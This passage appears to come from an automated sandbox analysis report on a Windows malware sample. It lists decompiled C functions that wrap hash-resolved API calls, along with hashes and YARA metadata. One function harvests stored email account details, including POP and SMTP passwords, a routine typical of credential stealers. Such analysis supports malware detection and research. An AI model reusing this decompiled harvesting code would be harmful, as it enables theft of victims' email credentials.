                          • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                          • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                          • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                          • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00403BEF(void* _a4) {
                          				int _t4;
                          				void* _t5;
                          
                          				E004031E5(_t5, 0, 0xda6ae59a, 0, 0);
                          				_t4 = FindClose(_a4); // executed
                          				return _t4;
                          			}





                          0x00403bfc
                          0x00403c04
                          0x00403c07

                          APIs
                          • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: CloseFind
                          • String ID:
                          • API String ID: 1863332320-0
                          • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                          • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                          • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                          • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00403BB7(WCHAR* _a4) {
                          				long _t4;
                          				void* _t5;
                          
                          				E004031E5(_t5, 0, 0xc6808176, 0, 0);
                          				_t4 = GetFileAttributesW(_a4); // executed
                          				return _t4;
                          			}





                          0x00403bc4
                          0x00403bcc
                          0x00403bcf

                          APIs
                          • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                          • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                          • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                          • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004049FF(void* _a4) {
                          				long _t3;
                          				void* _t4;
                          
                          				E004031E5(_t4, 9, 0xd980e875, 0, 0);
                          				_t3 = RegCloseKey(_a4); // executed
                          				return _t3;
                          			}





                          0x00404a0d
                          0x00404a15
                          0x00404a18

                          APIs
                          • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: Close
                          • String ID:
                          • API String ID: 3535843008-0
                          • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                          • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                          • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                          • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00403B64(WCHAR* _a4) {
                          				int _t3;
                          				void* _t4;
                          
                          				E004031E5(_t4, 2, 0xdc0853e1, 0, 0);
                          				_t3 = PathFileExistsW(_a4); // executed
                          				return _t3;
                          			}





                          0x00403b72
                          0x00403b7a
                          0x00403b7d

                          APIs
                          • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: ExistsFilePath
                          • String ID:
                          • API String ID: 1174141254-0
                          • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                          • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                          • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                          • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: recv
                          • String ID:
                          • API String ID: 1507349165-0
                          • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                          • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                          • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                          • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • closesocket.WS2_32(00404EB0), ref: 00404DEB
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: closesocket
                          • String ID:
                          • API String ID: 2781271927-0
                          • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                          • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                          • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                          • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00403F9E(void* _a4) {
                          				int _t3;
                          				void* _t4;
                          
                          				E004031E5(_t4, 0, 0xf53ecacb, 0, 0);
                          				_t3 = VirtualFree(_a4, 0, 0x8000); // executed
                          				return _t3;
                          			}





                          0x00403fac
                          0x00403fba
                          0x00403fbe

                          APIs
                          • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: FreeVirtual
                          • String ID:
                          • API String ID: 1263568516-0
                          • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                          • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                          • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                          • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00406472(long _a4) {
                          				void* _t3;
                          				void* _t4;
                          
                          				_t3 = E004031E5(_t4, 0, 0xcfa329ad, 0, 0);
                          				Sleep(_a4); // executed
                          				return _t3;
                          			}





                          0x0040647f
                          0x00406487
                          0x0040648a

                          APIs
                          • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: Sleep
                          • String ID:
                          • API String ID: 3472027048-0
                          • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                          • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                          • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                          • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004058EA(char* _a4, char* _a8) {
                          				char* _t4;
                          				void* _t5;
                          
                          				E004031E5(_t5, 2, 0xc5c16604, 0, 0);
                          				_t4 = StrStrA(_a4, _a8); // executed
                          				return _t4;
                          			}





                          0x004058f8
                          0x00405903
                          0x00405906

                          APIs
                          • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                          • Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
                          • Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                          • Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00405924(WCHAR* _a4, WCHAR* _a8) {
                          				WCHAR* _t4;
                          				void* _t5;
                          
                          				E004031E5(_t5, 2, 0xd6865bd4, 0, 0);
                          				_t4 = StrStrW(_a4, _a8); // executed
                          				return _t4;
                          			}





                          0x00405932
                          0x0040593d
                          0x00405940

                          APIs
                          • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                          • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                          • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                          • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions

                          APIs
                          • CoInitialize.OLE32(00000000), ref: 0040438F
                          • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                          • VariantInit.OLEAUT32(?), ref: 004043C4
                          • SysAllocString.OLEAUT32(?), ref: 004043CD
                          • VariantInit.OLEAUT32(?), ref: 00404414
                          • SysAllocString.OLEAUT32(?), ref: 00404419
                          • VariantInit.OLEAUT32(?), ref: 00404431
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: InitVariant$AllocString$CreateInitializeInstance
                          • String ID:
                          • API String ID: 1312198159-0
                          • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                          • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                          • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                          • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 88%
                          			E0040D069(void* __ebx, void* __eflags, intOrPtr* _a4) {
                          				signed int _v8;
                          				signed int _v12;
                          				intOrPtr _v16;
                          				intOrPtr _v20;
                          				intOrPtr _v24;
                          				intOrPtr _v28;
                          				intOrPtr _v32;
                          				intOrPtr _v36;
                          				intOrPtr _v40;
                          				intOrPtr _v44;
                          				void* __edi;
                          				void* __esi;
                          				intOrPtr _t40;
                          				intOrPtr _t45;
                          				intOrPtr _t47;
                          				void* _t71;
                          				void* _t75;
                          				void* _t77;
                          
                          				_t72 = _a4;
                          				_t71 = E00404BEE(__ebx,  *_a4, L"EmailAddress");
                          				_t81 = _t71;
                          				if(_t71 != 0) {
                          					_push(__ebx);
                          					_t67 = E00404BEE(__ebx,  *_t72, L"Technology");
                          					_v16 = E00404BEE(_t37,  *_t72, L"PopServer");
                          					_v40 = E00404BA7(_t81,  *_t72, L"PopPort");
                          					_t40 = E00404BEE(_t37,  *_t72, L"PopAccount");
                          					_v8 = _v8 & 0x00000000;
                          					_v20 = _t40;
                          					_v24 = E00404C4E(_t71,  *_t72, L"PopPassword",  &_v8);
                          					_v28 = E00404BEE(_t67,  *_t72, L"SmtpServer");
                          					_v44 = E00404BA7(_t81,  *_t72, L"SmtpPort");
                          					_t45 = E00404BEE(_t67,  *_t72, L"SmtpAccount");
                          					_v12 = _v12 & 0x00000000;
                          					_v32 = _t45;
                          					_t47 = E00404C4E(_t71,  *_t72, L"SmtpPassword",  &_v12);
                          					_t77 = _t75 + 0x50;
                          					_v36 = _t47;
                          					if(_v8 != 0 || _v12 != 0) {
                          						E00405872( *0x49f934, _t71, 1, 0);
                          						E00405872( *0x49f934, _t67, 1, 0);
                          						_t74 = _v16;
                          						E00405872( *0x49f934, _v16, 1, 0);
                          						E00405781( *0x49f934, _v40);
                          						E00405872( *0x49f934, _v20, 1, 0);
                          						_push(_v8);
                          						E00405762(_v16,  *0x49f934, _v24);
                          						E00405872( *0x49f934, _v28, 1, 0);
                          						E00405781( *0x49f934, _v44);
                          						E00405872( *0x49f934, _v32, 1, 0);
                          						_push(_v12);
                          						E00405762(_t74,  *0x49f934, _v36);
                          						_t77 = _t77 + 0x88;
                          					} else {
                          						_t74 = _v16;
                          					}
                          					E0040471C(_t71);
                          					E0040471C(_t67);
                          					E0040471C(_t74);
                          					E0040471C(_v20);
                          					E0040471C(_v24);
                          					E0040471C(_v28);
                          					E0040471C(_v32);
                          					E0040471C(_v36);
                          				}
                          				return 1;
                          			}





















                          0x0040d070
                          0x0040d080
                          0x0040d084
                          0x0040d086
                          0x0040d08c
                          0x0040d0a0
                          0x0040d0ae
                          0x0040d0bd
                          0x0040d0c0
                          0x0040d0c5
                          0x0040d0c9
                          0x0040d0e3
                          0x0040d0f2
                          0x0040d101
                          0x0040d104
                          0x0040d109
                          0x0040d110
                          0x0040d11e
                          0x0040d123
                          0x0040d126
                          0x0040d12d
                          0x0040d145
                          0x0040d154
                          0x0040d15a
                          0x0040d166
                          0x0040d174
                          0x0040d186
                          0x0040d18e
                          0x0040d19a
                          0x0040d1ac
                          0x0040d1ba
                          0x0040d1cc
                          0x0040d1d1
                          0x0040d1dd
                          0x0040d1e2
                          0x0040d1e7
                          0x0040d1e7
                          0x0040d1e7
                          0x0040d1eb
                          0x0040d1f1
                          0x0040d1f7
                          0x0040d1ff
                          0x0040d207
                          0x0040d20f
                          0x0040d217
                          0x0040d21f
                          0x0040d227
                          0x0040d230

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                          • API String ID: 0-2111798378
                          • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                          • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                          • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                          • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0040549C(signed int _a4, signed int* _a8) {
                          				signed int* _t46;
                          				void* _t47;
                          				signed int* _t48;
                          				signed int* _t49;
                          				signed int* _t50;
                          				signed int* _t51;
                          				signed int* _t52;
                          				signed int* _t53;
                          				signed int* _t55;
                          				signed int* _t57;
                          				signed int _t59;
                          				signed int _t61;
                          				signed int _t62;
                          				unsigned int _t64;
                          				signed int _t77;
                          				signed int _t79;
                          				signed int _t81;
                          				signed int _t95;
                          				signed int _t97;
                          				signed int _t98;
                          				signed int _t100;
                          				signed int _t102;
                          				signed char* _t124;
                          
                          				_t124 = _a4;
                          				_t59 =  *_t124 & 0x000000ff;
                          				if(_t59 >= 0) {
                          					_t57 = _a8;
                          					_t57[1] = _t57[1] & 0x00000000;
                          					 *_t57 = _t59;
                          					return 1;
                          				}
                          				_t95 = _t124[1] & 0x000000ff;
                          				if(_t95 >= 0) {
                          					_t55 = _a8;
                          					_t55[1] = _t55[1] & 0x00000000;
                          					 *_t55 = (_t59 & 0x0000007f) << 0x00000007 | _t95;
                          					return 2;
                          				}
                          				_t61 = _t59 << 0x0000000e | _t124[2] & 0x000000ff;
                          				if(_t61 < 0) {
                          					_t97 = _t95 << 0x0000000e | _t124[3] & 0x000000ff;
                          					_t62 = _t61 & 0x001fc07f;
                          					if(_t97 < 0) {
                          						_t98 = _t97 & 0x001fc07f;
                          						_t77 = _t62 << 0x0000000e | _t124[4] & 0x000000ff;
                          						if(_t77 < 0) {
                          							_t64 = _t62 << 0x00000007 | _t98;
                          							_t100 = _t98 << 0x0000000e | _t124[5] & 0x000000ff;
                          							if(_t100 < 0) {
                          								_t79 = _t77 << 0x0000000e | _t124[6] & 0x000000ff;
                          								if(_t79 < 0) {
                          									_t102 = _t100 << 0x0000000e | _t124[7] & 0x000000ff;
                          									_t81 = (_t79 & 0x001fc07f) << 7;
                          									if(_t102 < 0) {
                          										_t46 = _a8;
                          										 *_t46 = (_t102 & 0x001fc07f | _t81) << 0x00000008 | _t124[8] & 0x000000ff;
                          										_t46[1] = (_t124[4] & 0x000000ff) >> 0x00000003 & 0x0000000f | _t64 << 0x00000004;
                          										_t47 = 9;
                          									} else {
                          										_t48 = _a8;
                          										 *_t48 = _t102 & 0xf01fc07f | _t81;
                          										_t48[1] = _t64 >> 4;
                          										_t47 = 8;
                          									}
                          								} else {
                          									_t49 = _a8;
                          									 *_t49 = (_t100 << 0x00000007 ^ _t79) & 0x0fe03f80 ^ _t79;
                          									_t49[1] = _t64 >> 0xb;
                          									_t47 = 7;
                          								}
                          							} else {
                          								_t50 = _a8;
                          								_a4 = (_t77 & 0x001fc07f) << 0x00000007 | _t100;
                          								 *_t50 = _a4;
                          								_t50[1] = _t64 >> 0x12;
                          								_t47 = 6;
                          							}
                          						} else {
                          							_t51 = _a8;
                          							 *_t51 = _t98 << 0x00000007 | _t77;
                          							_t51[1] = _t62 >> 0x12;
                          							_t47 = 5;
                          						}
                          					} else {
                          						_t52 = _a8;
                          						_t52[1] = _t52[1] & 0x00000000;
                          						 *_t52 = _t97 & 0x001fc07f | _t62 << 0x00000007;
                          						_t47 = 4;
                          					}
                          					return _t47;
                          				} else {
                          					_t53 = _a8;
                          					_t53[1] = _t53[1] & 0x00000000;
                          					 *_t53 = (_t95 & 0x0000007f) << 0x00000007 | _t61 & 0x001fc07f;
                          					return 3;
                          				}
                          			}


























                          0x004054a1
                          0x004054a4
                          0x004054a9
                          0x004054ab
                          0x004054ae
                          0x004054b2
                          0x00000000
                          0x004054b4
                          0x004054bb
                          0x004054c1
                          0x004054c3
                          0x004054ce
                          0x004054d2
                          0x00000000
                          0x004054d4
                          0x004054e2
                          0x004054e6
                          0x00405513
                          0x00405515
                          0x00405519
                          0x0040553b
                          0x0040553d
                          0x00405541
                          0x00405565
                          0x0040556a
                          0x0040556e
                          0x0040559a
                          0x0040559e
                          0x004055c9
                          0x004055cb
                          0x004055d0
                          0x0040560d
                          0x00405610
                          0x00405612
                          0x00405615
                          0x004055d2
                          0x004055d2
                          0x004055e4
                          0x004055e6
                          0x004055e9
                          0x004055e9
                          0x004055a0
                          0x004055a0
                          0x004055b7
                          0x004055b9
                          0x004055bc
                          0x004055bc
                          0x00405570
                          0x00405570
                          0x0040557d
                          0x00405587
                          0x00405589
                          0x0040558c
                          0x0040558c
                          0x00405543
                          0x00405543
                          0x00405552
                          0x00405554
                          0x00405557
                          0x00405557
                          0x0040551b
                          0x0040551b
                          0x00405525
                          0x00405529
                          0x0040552b
                          0x0040552b
                          0x00000000
                          0x004054e8
                          0x004054e8
                          0x004054f9
                          0x004054fd
                          0x00000000
                          0x004054ff

                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: db4539c410e0fe4373e7c5db18565f275e95a05af4a94000d4ba81a11fef15ca
                          • Instruction ID: 891bc98f6eee734ec0083ebf38281cede3cc23ab6c94fa2f23d2f5c2768c820d
                          • Opcode Fuzzy Hash: db4539c410e0fe4373e7c5db18565f275e95a05af4a94000d4ba81a11fef15ca
                          • Instruction Fuzzy Hash: D141F1B0614B205EE30C8F19C895676BFE2EF82341748C07EE8AE8F695C635D506EF58
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 92%
                          			E004029D4(signed int _a28, signed int _a36, unsigned int _a40) {
                          				signed int _t26;
                          				signed int _t27;
                          				signed int _t28;
                          				signed int _t39;
                          				signed int _t47;
                          				unsigned int _t69;
                          				unsigned int _t70;
                          				signed int _t71;
                          				signed int _t73;
                          				signed int _t75;
                          				signed int* _t76;
                          
                          				asm("pushad");
                          				_t75 = _a36;
                          				_t69 = _a40;
                          				_t26 = 0;
                          				if(_t75 != 0) {
                          					_t27 = 0xffffffffffffffff;
                          					if(_t69 != 0) {
                          						while((_t75 & 0x00000003) != 0) {
                          							_t47 = _t27 ^  *_t75;
                          							_t75 = _t75 + 1;
                          							_t27 = _t47 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t47) * 4);
                          							_t69 = _t69 - 1;
                          							if(_t69 != 0) {
                          								continue;
                          							}
                          							break;
                          						}
                          						_t73 = _t69 & 0x00000007;
                          						_t70 = _t69 >> 3;
                          						while(_t70 != 0) {
                          							_t76 = _t75 + 4;
                          							_t39 = ((((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4))) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4))) * 4))) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4))) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4))) * 4))) * 4))) * 4) ^  *_t76;
                          							_t75 =  &(_t76[1]);
